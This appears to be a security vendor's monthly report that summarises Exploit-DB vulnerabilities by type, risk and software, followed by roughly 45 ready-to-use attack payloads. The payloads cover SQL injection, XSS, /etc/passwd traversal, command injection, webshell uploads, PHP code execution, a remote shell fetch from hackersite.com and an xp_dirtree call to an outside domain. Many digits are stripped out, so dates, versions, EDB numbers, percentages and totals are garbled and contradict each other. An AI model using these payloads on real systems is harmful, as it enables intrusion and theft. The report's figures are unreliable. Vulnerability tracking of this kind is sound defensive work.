Analysis summary (Prepared by: Penta Security Systems Security Evaluation Team)

EDB Analysis Report (06.06)
Period: 06.06.0~06.06.30
Information on the vulnerabilities published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

June 06 had the highest number of Exploit-DB reports of any month in the first half of the year, and correspondingly a wide variety of attack types were reported. SQL and XSS attacks were reported most often, but no new attack methods or unusual attack patterns were found. Most of the SQL vulnerabilities were of low attack difficulty and low risk, and the reports were simple attack patterns that only check whether a vulnerability exists. However, a program in which such a pattern succeeds can expect follow-up attacks, so the affected pages and parameters should be reviewed, and secure coding and software updates are essential.

After SQL, PHP Code vulnerabilities ranked third in the number reported. PHP Code vulnerabilities are relatively lower-risk than SQL vulnerabilities, but because many websites are built with PHP they are attacked frequently. To avoid exposure to PHP Code vulnerabilities, the functions and commands that PHP actually uses, such as fputs and fwrite, should be defined in advance before they are used.

Reports by vulnerability type
  Type          Reports
  RFI
  Command       3
  File Upload   3
  LFI           4
  (blank)       4
  Code          4
  XSS           3
  SQL           7
  Total         49

[Chart: reports by vulnerability type]

2. Classification by risk
  Risk      Reports   Percent
  High      5         0.0%
  (blank)   44        89.80%
  Total     49        00.00%

[Chart: classification by risk]

3. Status by attack difficulty
  Difficulty   Reports   Percent
  High                   4.08%
  (blank)      5         30.6%
  (blank)      3         65.3%
  Total        49        00.00%

[Chart: status by attack difficulty]

4. Occurrences by major software
  Software name                      Reports
  (blank)                            5
  Wordpress                          4
  Nagios                             3
  XuezhuLi FileSharing
  Kagao
  Cisco EPC 398
  BigTree CMS
  Notilus Travel Solution Software
  SugarCRM
  Drale DBTableViewer
  Electroweb
  Viart
  MyLittleForum
  jbfilemanager
  Airia
  OPAC KpwinSQL
  Relay Ajax Manager
  Concrete5
  Alibaba Clone BB Script
  rconfig
  ibilling
  Ultrabenosaurus ChatBoard
  Apache
  Tiki-Wiki CMS
  Liferay CE
  Vicidial
  Ktools
  Dokeos
  wwiki
  Total                              49

[Chart: occurrences by major software]
Vulnerability details (original table columns: Date, EDB No., Category, Attack difficulty, Attack risk, Name, Core attack code, Target program, Target environment)

Date 06-06-0 | EDB 39876 | Category: Code
Name: .0.3. - index.php Remote Command Execution
Core attack code:
  POST /%0.0.3./ajaxexplorer/index.php HTTP/.
  strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext=<?php exec($_get["cmd"]);?>
Target: .0.3.

Date 06-06-0 | EDB 39876 | Category: XSS
Name: .0.3. - index.php XSS
Core attack code:
  POST /%0.0.3./ajaxexplorer/index.php HTTP/.
  strpage=control/file/editor&strpath=p:/&strfile=terminal.php&strtext=<script>alert(666)</script>
Target: .0.3.

Date 06-06-0 | EDB 3988 | Category: File Upload
Name: Relay Ajax Manager relayb0-07706,.5.,.5.3 - / File Upload
Core attack code:
  POST / HTTP/.
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
  -----------------------------7dd009908f
  Content-Disposition: form-data; name="file"; filename="info.php"
  Content-Type: application/octet-stream
  <? phpinfo();?>
  -----------------------------7dd009908f--
Target program: Relay Ajax Manager | Target environment: Relay Ajax Manager relayb0-07706,.5.,.5.3

Date 06-06-0 | EDB 39880 | Category: XSS
Name: Liferay CE < 6. CE GA6 - /liferay/web/guest/ XSS
Core attack code:
  POST /liferay/web/guest/home?p_p_id=58&p_p_lifecycle=&p_p_state=maximized&p_p_mode=view&_58_struts_action=%flogin%fcreate_account HTTP/.
  _58_firstName=%%3E%3Cscript%3Ealert%8%7xss%7%9%3C%
Target program: Liferay CE | Target environment: Liferay CE < 6. CE GA6

Date 06-06-0 | EDB 39879 | Category: SQL | Difficulty/Risk: High
Name: SecurityCheck Extension .8.9 - index.php SQL
Core attack code:
  /index.php?option='or(extractvalue(,concat(0x3a,(select(database())))))='
Target: SecurityCheck Extension .8.9

Date 06-06-06 | EDB 39899 | Category: SQL | Difficulty/Risk: High
Name: Nagios XI 5..7 - nagiosim.php SQL Injection
Core attack code:
  /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+and+(select++from(select+count(*),coNCAT(' APIKEY ',(SELECT+MID((IFNULL(CAST(backend_ticket+AS+CHAR),0x0)),,54)+FROM+xi_users+WHERE+user_id%3d+LIMIT+0,),' APIKEY ',FLOOR(RAND(0)*))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+'
Target program: Nagios | Target environment: Nagios XI 5..7
Date 06-06-06 | EDB 39898 | Category: LFI
Name: rconfig 3.. - downloadfile.php LFI
Core attack code:
  /lib/crud/downloadfile.php?download_file=/etc/passwd
Target program: rconfig | Target environment: rconfig 3..

Date 06-06-06 | EDB 39897 | Category: SQL | Difficulty: High | Risk: High
Name: Notilus Travel Solution Software 0 R3 - Password.aspx SQL
Core attack code:
  POST /company/profilv4/password.aspx HTTP/.
  ACTION=&H_OLD=mypass'%3bdeclare%0@q%0varchar(99)%3bset%0@q%3d'\\\\testdomain.mydo'%b'main.com\\vps'%3b%0exec%0master.dbo.xp_dirtree%0@q%3b-- %0&H_NEW=%7+or+%7%7%3D%7&H_NEW=%7+or+%7%7%3D%7
Target program: Notilus Travel Solution Software | Target environment: Travel Solution Software 0 R

Date 06-06-06 | EDB 39896 | Category: SQL | Difficulty/Risk: High
Name: Double Opt-In for Download Plugin .0.9 - admin-ajax.php SQL
Core attack code:
  POST /wp-admin/adminajax.php?action=populate_download_edit_form HTTP/.
  id=0 UNION SELECT,, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=
Target program: Wordpress | Target environment: Double Opt-In for Download Plugin .0.

Date 06-06-06 | EDB 3989 | Category: RFI
Name: WP Mobile Detector Plugin 3.5 - resize.php RFI
Core attack code:
  /wp-content/plugins/wp-mobiledetector/resize.php?src=http://www.test.com/index.php
Target program: Wordpress | Target environment: WP Mobile Detector Plugin 3.5

Date 06-06-06 | EDB 39890 | Category: SQL
Name: Electroweb Online Examination System .0 - showtest.php SQL
Core attack code:
  /showtest.php?subid=%0and%0=--
Target program: Electroweb | Target environment: Electroweb Online Examination System .0

Date 06-06-06 | EDB 39899 | Category: Command
Name: Nagios XI 5..7 - nagiosim.php Command
Core attack code:
  /nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<apitoken>&incident_id=<valid incident id>&title=title'; touch /tmp/file; echo&status=
Target program: Nagios | Target environment: Nagios XI 5..7

Date 06-06-06 | EDB 39899 | Category: Command
Name: Nagios XI 5..7 - graphapi.php Command
Core attack code:
  /nagiosxi/includes/components/perfdata/graphapi.php?host=<any monitoredhost IP>&start=&end=; touch /tmp/file;
Target program: Nagios | Target environment: Nagios XI 5..7
Date 06-06-06 | EDB 39886 | Category: XSS
Name: Apache Continuum .4. - useredit_confirmadminpassword.action XSS
Core attack code:
  /continuum/security/useredit_confirmadminpassword.action?useradminpassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullname=guest&user.email=blah@procheckup.com&user.password=password&user.confirmpassword=password&user.timestampaccountcreation=&user.timestamplastlogin=&user.timestamplastpasswordchange=&user.locked=false&user.passwordchangerequired=false&method:confirmadminpassword=submit&cancel=cancel<http://7.0.0.:8080/continuum/security/useredit_confirmadminpassword.action?useradminpassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullname=guest&user.email=blah@procheckup.com&user.password=password&user.confirmpassword=password&user.timestampaccountcreation=&user.timestamplastlogin=&user.timestamplastpasswordchange=&user.locked=false&user.passwordchangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Target program: Apache | Target environment: Apache Continuum .4.

Date 06-06-06 | EDB 39883 | Category: LFI
Name: Simple Backup Plugin .7. - tools.php LFI vulnerability
Core attack code:
  /wpadmin/tools.php?page=backup_manager&download_backup_file=oldbackups/../../../../../../etc/passwd
Target: Simple Backup Plugin .7.

Date 06-06-07 | EDB 39904 | Category: XSS
Name: Cisco EPC 398 - /goform/administration XSS vulnerability
Core attack code:
  POST /goform/administration HTTP/.
  working_mode=0&sysname=<script>alert('xss')</script>&syspasswd=home&sysconfirmpasswd=home&save=save+settings&preworkingmode=&h_wlan_enable=enable&h_user_type=common
Target program: Cisco EPC 398 | Target environment: Cisco EPC 398

Date 06-06-07 | EDB 39904 | Category: XSS
Name: Cisco EPC 398 - /goform/wclientmaclist
Core attack code:
  POST /goform/wclientmaclist HTTP/.
  sortwireless=mac&h_sortwireless=mac" onmouseover=alert() x="y
Target program: Cisco EPC 398 | Target environment: Cisco EPC 398

Date 06-06-08 | EDB 39905 | Category: SQL
Name: Drale DBTableViewer 003 - /vul_test/dbtableviewer/ SQL
Core attack code:
  /vul_test/dbtableviewer/?orderby=nice_name%0rlike%0(select%0(CASE%0WHEN%0(697=697)%0THEN%00x6e6963655f6e66d65%0else%00x8%0end))&sort=desc&sort=desc
Target program: Drale DBTableViewer | Target environment: Drale DBTableViewer 00

Date 06-06-3 | EDB 39936 | Category: SQL
Name: PayPlans (com_payplans) Extension 3.3.6 - index.php SQL
Core attack code:
  index.php?option=com_payplans&group_id=%0and%0=--
Target: PayPlans (com_payplans) Extension 3.3.6
Date 06-06-3 | EDB 3993 | Category: File Upload
Name: Viart Shopping Cart 5.0 - admin_fm_upload_files.php File Upload
Core attack code:
  POST /admin/admin_fm_upload_files.php HTTP/.
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
  -----------------------------7dd009908f
  Content-Disposition: form-data; name="newfile_0"; filename="shell.php"
  Content-Type: application/octet-stream
  <? phpinfo();?>
  -----------------------------7dd009908f--
Target program: Viart | Target environment: Viart Shopping Cart 5.0

Date 06-06-5 | EDB 39956 | Category: (blank)
Name: jbfilemanager - jbfm.php
Core attack code:
  /vul_test/jbfilemanager/jbfm/jbfm.php?act=open&path=/../../../../../../../../../etc/
Target program: jbfilemanager | Target environment: jbfilemanager

Date 06-06-5 | EDB 39955 | Category: XSS
Name: Booking System < 5.5 - eventlist.php XSS
Core attack code:
  /scripts/booking/eventlist.php?serviceid=337%%0onmouseover=%alert()
Target: Booking System < 5.5

Date 06-06-5 | EDB 39953 | Category: SQL
Name: En Masse (com_enmasse) Component 5. - 6.4 - /component/enmasse/ SQL
Core attack code:
  /component/enmasse/term?tmpl=component&id=%0and%0=--
Target: En Masse (com_enmasse) Component 5.

Date 06-06-5 | EDB 3995 | Category: SQL
Name: Dokeos .. - slideshow.php SQL
Core attack code:
  /dokeos-../main/document/slideshow.php?cidreq=3&curdirpath=%7%0AND%0(SELECT%0*%0FROM%0(SELECT(SLEEP(5)))Pfag)%0AND%0%7NFwV%7=%7NFwV&slide_id=all
Target program: Dokeos | Target environment: Dokeos ..

Date 06-06-5 | EDB 39955 | Category: SQL
Name: Booking System < 5.5 - eventlist.php SQL
Core attack code:
  POST /ajax/checkchangeavailability.php HTTP/.
  id=' AND SLEEP(5) AND 'WAlE'='WAlE
Target: Booking System < 5.5
Date 06-06-5 | EDB 39950 | Category: XSS
Name: wwiki - index.php XSS
Core attack code:
  POST /vul_test/wwiki/index.php HTTP/.
  page=xss&newtext=afsd%3cimg+src%3d%h%+onerror%3dalert%845%9%3eaa&action=save
Target program: wwiki | Target environment: wwiki

Date 06-06-5 | EDB 39948 | Category: XSS
Name: Ultrabenosaurus ChatBoard - chat.php XSS
Core attack code:
  POST /vul_test/chatboard/original/chat.php HTTP/.
  msg=654<img src="z" onerror=zz>asd
Target program: Ultrabenosaurus ChatBoard | Target environment: Ultrabenosaurus ChatBoard

Date 06-06-6 | EDB 39965 | Category: Code
Name: Tiki-Wiki CMS Calendar 4., .5 LTS, 9. LTS, and 6.5 - tiki-calendar.php Code
Core attack code:
  /tikicalendar.php?viewmode=%7;%0$z=fopen%8%shell.php%,%7w%7%9;fwrite%8$z,file_get_contents%8%http://hackersite.com/r57.txt%%9%9;fclose%8$z%9;%7
Target program: Tiki-Wiki CMS | Target environment: Tiki-Wiki CMS Calendar 4., .5 LTS, 9. LTS, and 6.5

Date 06-06-7 | EDB 39970 | Category: XSS
Name: Vicidial . - admin.php XSS
Core attack code:
  POST / HTTP/.
  ADD=&DB=&script_id=tests&script_name=<script>alert('XSS!' </script>&script_comments=test& active=y&user_group=---all--- &selectedfield=fullname&script_text=<script>alert('xss!'</script>&submit=submit
Target program: Vicidial | Target environment: Vicidial .

Date 06-06-0 | EDB 3998 | Category: File Upload
Name: Airia - editor.php File Upload
Core attack code:
  POST /editor.php HTTP/.
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
  -----------------------------7dd009908f
  Content-Disposition: form-data; name="file"; filename="shell.php"
  Content-Type: application/octet-stream
  <?php echo 'Airia Webshell Exploit';#{shell};?>
  -----------------------------7dd009908f--
Target program: Airia | Target environment: Airia

Date 06-06-0 | EDB 39977 | Category: SQL
Name: BT Media (com_bt_media) Component - index.php SQL
Core attack code:
  /index.php?option=com_bt_media&view=list&categories[0]=%0and%0=--&itemid=34
Target: BT Media (com_bt_media) Component
Date 06-06-0 | EDB 39976 | Category: Command
Name: .7. - /snews.7./ Command
Core attack code:
  POST /snews.7./?action=process&task=admin_article&id= HTTP/.
  AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75
  text=[func]system: :"calc.exe"[/func]
Target: .7.

Date 06-06-0 | EDB 39976 | Category: XSS
Name: .7. - /snews.7./ XSS
Core attack code:
  POST /snews.7./?action=process&task=admin_article&id= HTTP/.
  text=[include]<script>alert(document.cookie)</script>[/include]
Target: .7.

Date 06-06- | EDB 39989 | Category: SQL
Name: Publisher Pro (com_publisher) Component - index.php SQL
Core attack code:
  /index.php?option=com_publisher&view=issues&itemid=%0and%0=--&lang=en
Target: Publisher Pro (com_publisher) Component

Date 06-06-3 | EDB 400 | Category: (blank)
Name: - api.php
Core attack code:
  /vul_test//api.php?callback=jquery07685743998649676_46666565&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=46666567

Date 06-06-3 | EDB 40009 | Category: (blank)
Name: XuezhuLi FileSharing - download.php
Core attack code:
  /vul_test/filesharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd
Target program: XuezhuLi FileSharing | Target environment: XuezhuLi FileSharing

Date 06-06-3 | EDB 40006 | Category: LFI
Name: Alibaba Clone BB Script - show_page.php LFI
Core attack code:
  /show_page.php?page=../configure.php%00
Target program: Alibaba Clone BB Script | Target environment: Alibaba Clone BB Script

Date 06-06-3 | EDB 400 | Category: XSS
Name: - api.php XSS
Core attack code:
  /vul_test//api.php?callback=jquery078746545656_466665079}}c07%3Cscript%3Ealert%8%9%3C%fscript%3ecfea&type=get&mode=0&_=466665080
Date 06-06-3 | EDB 40009 | Category: (blank)
Name: XuezhuLi FileSharing - viewing.php
Core attack code:
  /vul_test/filesharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd
Target program: XuezhuLi FileSharing | Target environment: XuezhuLi FileSharing

Date 06-06-7 | EDB 4004 | Category: SQL | Difficulty: High | Risk: High
Name: BigTree CMS 4.. - /site/index.php/admin/pages/update/ SQL
Core attack code:
  POST /site/index.php/admin/pages/update/ HTTP/.
  page=' and 6=3 or =+(SELECT and ROW(,)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(5),CHAR(00),CHAR(05),CHAR(08),CHAR(0),CHAR(09),CHAR(09),CHAR(97),0x3a,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Target program: BigTree CMS | Target environment: BigTree CMS 4..

Date 06-06-7 | EDB 400 | Category: XSS
Name: ibilling 3.7.0 - index.php XSS
Core attack code:
  POST /ibilling/index.php HTTP/.
  account=%%3e%3cscript%3ealert()%3c%fscript%3e&company=%%3e%3cscript%3ealert()%3c%fscript%3e&email=test%40yahoo.com&phone=%%3E%3Cscript%3Ealert(4)%3C%Fscript%3e&address=%%3e%3cscript%3ealert(5)%3c%fscript%3E&city=%%3E%3Cscript%3Ealert(6)%3C%Fscript%3E&state=%%3E%3Cscript%3Ealert(7)%3C%Fscript%3E&zip=%%3E%3Cscript%3Ealert(8)%3C%Fscript%3E&country=TR&tags%5B%5D=web_development%%3E%3Cscript%3Ealert(9)%3C%Fscript%3E
Target program: ibilling | Target environment: ibilling 3.7.0

Date 06-06-7 | EDB 400 | Category: Code
Name: MyLittleForum .3.5 - /install/index.php Code
Core attack code:
  POST /install/index.php HTTP/.
  database=';?><?php echo passthru('/bin/cat /etc/passwd');'
Target program: MyLittleForum | Target environment: MyLittleForum .3.5

Date 06-06-7 | EDB 4009 | Category: SQL
Name: Kagao 3.0 - cat.php SQL
Core attack code:
  /cat.php?id=999999.9%%0union%0all%0select%0concat%80x7e%C0x7%Cunhex%8Hex%8cast%8database%8%9%0as%0char%9%9%9%C0x7%C0x7e%9--%0a
Target program: Kagao | Target environment: Kagao 3.0

Date 06-06-7 | EDB 4007 | Category: Code
Name: SugarCRM 6.5.8 - index.php Code
Core attack code:
  /index.php?module=connectors&action=runtest&source_id=ext_rest_insideview&ext_rest_insideview_[%7.phpinfo().%7]=
Target program: SugarCRM | Target environment: SugarCRM 6.5.8
Date 06-06-7 | EDB 4009 | Category: XSS
Name: Kagao 3.0 - cat.php XSS
Core attack code:
  /cat.php?id=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%%3e%3cscript%3ealert%8%7n4tural%7%9%3B%3C%Fscript%3E&id=0&sucheWo=&umkreis=0
Target program: Kagao | Target environment: Kagao 3.0

Date 06-06-7 | EDB 4003 | Category: SQL
Name: OPAC KpwinSQL - zaznam.php SQL
Core attack code:
  /zaznam.php?detail_num=%0and%0=--
Target program: OPAC KpwinSQL | Target environment: OPAC KpwinSQL

Date 06-06-9 | EDB 40045 | Category: LFI
Name: Concrete5 5.7.3. - index.php LFI
Core attack code:
  GET /concrete5/index.php HTTP/.
  X-Original-Url: /tools/../../index
  Connection: keep-alive
Target program: Concrete5 | Target environment: Concrete5 5.7.3.

Date 06-06-9 | EDB 4004 | Category: SQL
Name: Ultimate Membership Pro Plugin 3.3 - admin-ajax.php SQL
Core attack code:
  POST / HTTP/.
  action=ihc_preview_user_listing&shortcode=[ihc-list-users filter_by_level="" levels_in="[ihc-list-users filter_by_level="" levels_in="') union all select (SELECT CASE WHEN ($sql) then else *(select table_name from information_schema.tables) end)#" theme="ihc-theme_" theme="ihc-theme_
Target program: Wordpress | Target environment: Ultimate Membership Pro Plugin 3.3

Date 06-06-30 | EDB 40046 | Category: SQL
Name: Ktools Photostore 4.7.5 - mgr.login.php SQL vulnerability
Core attack code:
  POST / HTTP/.
  email=%7%0and%0=--;#
Target program: Ktools | Target environment: Ktools Photostore 4.7.5